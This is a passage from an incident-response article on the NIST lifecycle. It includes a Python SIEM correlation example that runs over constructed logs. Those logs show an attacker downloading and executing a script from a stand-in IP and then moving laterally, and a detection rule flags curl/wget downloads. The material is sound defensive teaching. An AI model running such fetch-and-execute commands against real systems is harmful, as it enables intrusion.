Containment, Eradication, and Recovery

A triggered alert in a Security Information and Event Management (SIEM) console captures a single point in time; the incident it signals is a fluid, expanding system that keeps moving after the alert fires.

A typical SIEM infrastructure aggregates and correlates logs from multiple sources to generate the initial point-in-time alerts that trigger incident response.
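As an added illustration of the aggregation-and-correlation stage the caption describes (example code written for this page, not from the original article or any SIEM product), the following Python normalizes constructed log lines from two sources, an SSH auth log and an endpoint process log, into a single event stream, runs two correlation rules over it, and then lists the events that arrive after the alert fires. The log lines, hostnames, IP addresses, thresholds and rule names are all made up for the example.

```python
"""Minimal SIEM-style correlation over constructed log lines (added example)."""
import re
from datetime import datetime, timedelta

# Constructed sample input: an SSH auth log and an endpoint process log.
AUTH_LOG = [
    "2024-03-01T09:00:01 sshd: Failed password for admin from 203.0.113.7",
    "2024-03-01T09:00:03 sshd: Failed password for admin from 203.0.113.7",
    "2024-03-01T09:00:05 sshd: Failed password for admin from 203.0.113.7",
    "2024-03-01T09:00:07 sshd: Failed password for admin from 203.0.113.7",
    "2024-03-01T09:00:09 sshd: Failed password for admin from 203.0.113.7",
    "2024-03-01T09:00:12 sshd: Accepted password for admin from 203.0.113.7",
    "2024-03-01T09:30:00 sshd: Accepted publickey for deploy from 198.51.100.4",
]
PROC_LOG = [
    "2024-03-01T09:00:20 host=web-01 user=admin exec=/usr/bin/curl args=http://203.0.113.7/x.sh",
    "2024-03-01T09:00:45 host=web-01 user=admin exec=/bin/bash args=/tmp/x.sh",
    "2024-03-01T09:05:10 host=web-01 user=admin exec=/usr/bin/ssh args=db-01",
]

AUTH_RE = re.compile(
    r"^(?P<ts>\S+) sshd: (?P<outcome>Failed|Accepted) \w+ for (?P<user>\S+) from (?P<ip>\S+)$"
)
PROC_RE = re.compile(
    r"^(?P<ts>\S+) host=(?P<host>\S+) user=(?P<user>\S+) exec=(?P<exe>\S+) args=(?P<args>.*)$"
)


def parse_auth(line):
    """Normalize one sshd line into a common event dict, or None if it does not match."""
    m = AUTH_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "source": "auth",
            "kind": "auth_ok" if m["outcome"] == "Accepted" else "auth_fail",
            "user": m["user"], "ip": m["ip"]}


def parse_proc(line):
    """Normalize one process-execution line into the same common event shape."""
    m = PROC_RE.match(line)
    if not m:
        return None
    return {"ts": datetime.fromisoformat(m["ts"]), "source": "proc", "kind": "exec",
            "host": m["host"], "user": m["user"], "exe": m["exe"], "args": m["args"]}


def normalize(auth_lines, proc_lines):
    """Aggregate both sources into one time-ordered event stream."""
    events = [e for e in map(parse_auth, auth_lines) if e]
    events += [e for e in map(parse_proc, proc_lines) if e]
    return sorted(events, key=lambda e: e["ts"])


def correlate(events, fail_threshold=5, window=timedelta(minutes=2)):
    """Run two cross-source rules; each alert is stamped with the time of its triggering event."""
    alerts = []
    for i, ev in enumerate(events):
        earlier = events[:i]  # events is sorted, so these all precede ev
        if ev["kind"] == "auth_ok":
            # Rule 1: threshold of failures for the same user/IP inside the window, then a success.
            fails = [p for p in earlier if p["kind"] == "auth_fail" and p["user"] == ev["user"]
                     and p["ip"] == ev["ip"] and ev["ts"] - p["ts"] <= window]
            if len(fails) >= fail_threshold:
                alerts.append({"rule": "brute_force_then_success", "ts": ev["ts"],
                               "user": ev["user"], "ip": ev["ip"]})
        elif ev["kind"] == "exec" and ev["exe"].endswith(("curl", "wget")):
            # Rule 2: a download whose URL names the IP that just logged in as this user.
            logins = [p for p in earlier if p["kind"] == "auth_ok" and p["user"] == ev["user"]
                      and ev["ts"] - p["ts"] <= window and p["ip"] in ev["args"]]
            if logins:
                alerts.append({"rule": "post_login_download_from_source_ip", "ts": ev["ts"],
                               "user": ev["user"], "host": ev["host"], "ip": logins[-1]["ip"]})
    return alerts


def events_after(alert_ts, events):
    """Everything the stream records after an alert's timestamp: the part the alert does not show."""
    return [e for e in events if e["ts"] > alert_ts]


if __name__ == "__main__":
    stream = normalize(AUTH_LOG, PROC_LOG)
    for a in correlate(stream):
        print("ALERT", a["ts"].isoformat(), a["rule"], a)
    print("events after first alert:", len(events_after(correlate(stream)[0]["ts"], stream)))
```

Run against the constructed input, the first alert fires at 09:00:12 on the successful login, yet the stream already holds a payload download, its execution, and an SSH hop toward db-01 in the minutes that follow; the alert is the point in time, the events after it are the incident responders actually have to contain.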

When malicious code executes in memory or an adversary pivots across an environment, operational survival depends on a methodical, structured framework rather than improvised reactions. The National Institute of Standards and Technology Special Publication 800-61 Revision 2 defines a four-phase incident response lifecycle to govern this process: Preparation; Detection and Analysis; Containment, Eradication, and Recovery; and Post-Incident Activity. The lifecycle is deliberately iterative rather than strictly linear: containment routinely uncovers new indicators that send responders back to detection and analysis before eradication can proceed. While preparation and initial detection are critical, the battle is truly fought and won in the third phase: Containment, Eradication, and Recovery.